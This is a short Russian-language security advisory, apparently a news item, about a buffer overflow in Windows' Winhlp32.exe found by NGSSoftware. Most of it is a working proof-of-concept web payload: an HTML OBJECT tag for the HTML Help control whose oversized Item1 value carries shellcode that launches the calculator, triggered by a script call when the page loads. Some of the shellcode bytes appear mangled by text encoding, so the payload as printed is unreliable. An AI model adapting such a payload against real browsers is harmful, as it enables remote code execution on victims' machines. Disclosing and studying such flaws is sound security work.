В программе Winhlp32.exe можно переполнить
буфер и, как следствие, получить полный
доступ к системе. NGSSoftware обнаружила, что
передавая излишне длинный путь к
файлу справки удаленный пользователь может
выполнить на машине пользователя любые
команды.
Пример - запускается калькулятор:
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0
height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM
NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1"
VALUE="ђђђђђђђђ3АPhcalcЌ4$ƒАPVёЇ§йwяР3АPѕ”ЏйwяЦAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
PPPQQQQRRRRSSSSTTTAAAA©хwABCDEFGHђƒЖяжgMyWindow"><PARAM
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>